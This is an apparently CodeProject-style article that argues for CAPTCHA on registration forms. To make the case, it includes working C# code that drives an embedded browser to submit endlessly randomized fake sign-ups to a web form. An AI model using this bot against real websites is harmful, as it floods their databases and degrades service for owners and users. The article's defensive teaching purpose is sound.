Prevent attacks on your website

• Download source code - 51.9 Kb

Introduction

There are many ways of attacking a website like SQL injection, by injecting script, Session hacking etc. And you'll get lot of articles at CodeProject about this. In this article, I am trying to explain the use of CAPTCHA (I am not going to explain what CAPTCHA is ... search it on CodeProject or Google if you have not implemented it.) to avoid registration of dummy users to your database by a computer program. Using a simple example, I'll explain how any program can register thousands of dummy users to your database and play with your database and application performance.

A sample application which can spoil your website:

Here we are going to create a Windows application and execute out a test. We'll use classic COM AxSHDocVw.AxWebBrowser control, along with MSHTML which provides Internet Explorer with complete HTML Document Object Model parsing.

In this example, we are using the following Windows ActiveX objects.

• mshtml.tlb
• SHDocVw.dll

You can find them in your �windows/system32� directory.

Steps we are going to perform:

• Step 1 - Grab the registration page using the WebBrowser Control.
• Step 2 - Using MSHTML we can locate various form fields of the registration page.
• Step 3 - Generate random fields.
• Step 4 - Submit the field values to the website for registration.

and we are going to repeat step 3 and 4 infinite times :)

Let us assume that a website is having a registration form with the following text fields.

• UserId
• First Name
• Last Name
• Password
• Confirm Password

And a Submit button. Find the IDs of each field. Open the registration page in your normal browser and using View Source find the ID of each field.

Now let us go to the coding part of this application.

Load the registration page to the WebBrowser at the form load.

private void Form1_Load(object sender, System.EventArgs e)
{
    //get the registrations page URL

    string url="http://localhost:8181/TestApplication1/Registration.aspx";

    Object o = null;

    //fetch the page to your web browser.

    WebBrowser1.Navigate(url, ref o, ref o, ref o, ref o);
}

Now execute the code to register infinite users.

private void btnRegisterClick_Click(object sender, System.EventArgs e)
{
    // use the HTMLDocument interface of mshtml to simulate the registration process

    mshtml.HTMLDocument obj;
    string tempGuid,userId,firstName,LastName,password=string.Empty;
    //execute an infinite loop

    while(true)
    {
        try
        {
            //get the random values for this user

            tempGuid=System.Guid.NewGuid().ToString();
            userId=tempGuid.Substring(0,9);
            firstName=tempGuid.Substring(3,12);
            LastName=tempGuid.Substring(11,10);
            password=tempGuid.Substring(10,8);
            // assign the values to the form fields.

            obj=(mshtml.HTMLDocument)WebBrowser1.Document;
            obj.getElementById("txtUserId").innerText=userId;
            obj.getElementById("txtFirstName").innerText=firstName;
            obj.getElementById("txtLastName").innerText=LastName;
            obj.getElementById("txtPassword").innerText=password;
            obj.getElementById("txtConfirmPassword").innerText=password;

            // find the submit button to post the information to the website

            // execute the click of the submit button to post the information

            obj.getElementById("btnSubmit").click();
            // Note if you can't find the submit button

            // by id then use the following approach

            // find it by index in the entire HTMLDocument

            /*
               mshtml.HTMLInputElement objbut;
               objbut=(mshtml.HTMLInputElement)obj.all.item("submit",0);
               objbut.click();
            */
        }
        catch
        {
            // failed :(

            // no problem we'll try again( try try until the site die ..)

        }
    }

I think the code above is self explanatory.

Let�s come to the solution part

To avoid this type of attacks on our website we need to allow only human users for registration not a computer program. The best approach for this is to write distorted text on the fly to an image and let the registrant identify the text written on the image so that every human can read that text. It�s very hard to read a distorted text written on an image by a computer application as explained above.

A vulnerable registration form.

More secured registration form.

To know more about CAPTCHA, you can browse The CAPTCHA Project. And to implement CAPTCHA in your web application, you can take the help of various articles published at CodeProject about CAPTCHA.

Conclusion

By this article, I just want to show that we should consider such small things to avoid big disasters later.